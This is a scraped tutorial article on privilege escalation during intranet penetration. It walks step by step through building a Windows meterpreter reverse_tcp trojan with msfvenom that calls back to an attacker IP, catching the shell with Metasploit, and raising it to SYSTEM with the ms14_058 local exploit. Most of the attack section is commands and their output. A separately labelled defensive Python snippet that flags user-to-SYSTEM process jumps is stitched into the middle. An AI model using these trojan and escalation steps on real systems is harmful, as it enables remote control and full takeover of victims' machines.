
How to use a privilege escalation vulnerability to elevate privileges in big data intranet penetration

2025-02-28 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

This article explains how to use a privilege escalation vulnerability to elevate privileges during intranet penetration in a big data environment. The walkthrough is detailed; interested readers can use it as a reference, and I hope it is helpful.

Environment:

Attacker machine: Kali 2020, IP: 192.168.1.133

Victim machine: Win7 x86, IP: 192.168.1.137

First, generate the Trojan

1. Check the available payloads for Windows

msfvenom -l payloads | grep windows | grep tcp

2. Select windows/meterpreter/reverse_tcp and generate the Trojan

-p select a payload

-l list the available modules (payloads here)

-f format of the generated file

-e encoder to use

-i number of encoding iterations

-b byte values to avoid in the generated program

-x allows us to specify a custom executable as a template, that is, to bind the Trojan to this executable

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.133 LPORT=4444 -b "\x00" -f exe > aiyou.exe

3. An aiyou.exe file is generated under the /root directory

Second, listen for the victim machine through Metasploit

1. Start Metasploit: use exploit/multi/handler

2. Set the payload: set payload windows/meterpreter/reverse_tcp

3. Set the listening address: set lhost 192.168.1.133

4. Set the listening port: set lport 4444

5. run

6. Copy the generated aiyou.exe to the victim machine and run it; getuid shows that the session has the permissions of an ordinary user

Third, the privilege escalation vulnerability (ms14_058)

1. Select the privilege escalation exploit: use exploit/windows/local/ms14_058_track_popup_menu

2. Check the parameters to be set: show options

3. Set the session value: set session 1, then execute run

4. A new session is created; check its permissions

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM
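Seen from the defender's side, the jump shown in the steps above, from an ordinary user to NT AUTHORITY\SYSTEM, is something process-creation telemetry can surface. The Python sketch below is an added example, not part of the original article: it flags records in which a child process runs as SYSTEM although its parent was started by an ordinary user. The record fields, the user name and the sample events are constructed for illustration and are not a real log schema.

```python
# Added example: heuristic check for a user-to-SYSTEM jump in process lineage.
SYSTEM = "NT AUTHORITY\\SYSTEM"

# Constructed sample records in chronological order (hypothetical field names).
SAMPLE_EVENTS = [
    {"pid": 400, "ppid": 4, "user": SYSTEM, "image": "services.exe"},
    {"pid": 812, "ppid": 400, "user": SYSTEM, "image": "svchost.exe"},
    {"pid": 1500, "ppid": 812, "user": "WIN7\\alice", "image": "explorer.exe"},
    {"pid": 2216, "ppid": 1500, "user": "WIN7\\alice", "image": "aiyou.exe"},
    {"pid": 2304, "ppid": 2216, "user": SYSTEM, "image": "cmd.exe"},
    {"pid": 2400, "ppid": 1500, "user": "WIN7\\alice", "image": "notepad.exe"},
]


def is_system(user):
    """True when the account name is the local SYSTEM account."""
    return user.strip().upper() == SYSTEM


def find_privilege_jumps(events):
    """Return records whose process runs as SYSTEM under a non-SYSTEM parent.

    A parent that ran as SYSTEM (services.exe, svchost.exe) starting user or
    SYSTEM children is normal; the reverse direction is the anomaly.
    """
    owner = {}      # pid -> (user, image) as recorded at process creation
    findings = []
    for ev in events:
        parent = owner.get(ev["ppid"])
        if parent and is_system(ev["user"]) and not is_system(parent[0]):
            findings.append({
                "pid": ev["pid"],
                "image": ev["image"],
                "parent_image": parent[1],
                "parent_user": parent[0],
            })
        # Overwrite on PID reuse so the latest creation record wins.
        owner[ev["pid"]] = (ev["user"], ev["image"])
    return findings


if __name__ == "__main__":
    for hit in find_privilege_jumps(SAMPLE_EVENTS):
        print("SYSTEM child under user parent:", hit)
```
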

That concludes this walkthrough of how to use a privilege escalation vulnerability to elevate privileges during big data intranet penetration. I hope the content above is of some help and that you can learn more from it. If you think the article is good, you can share it for more people to see.
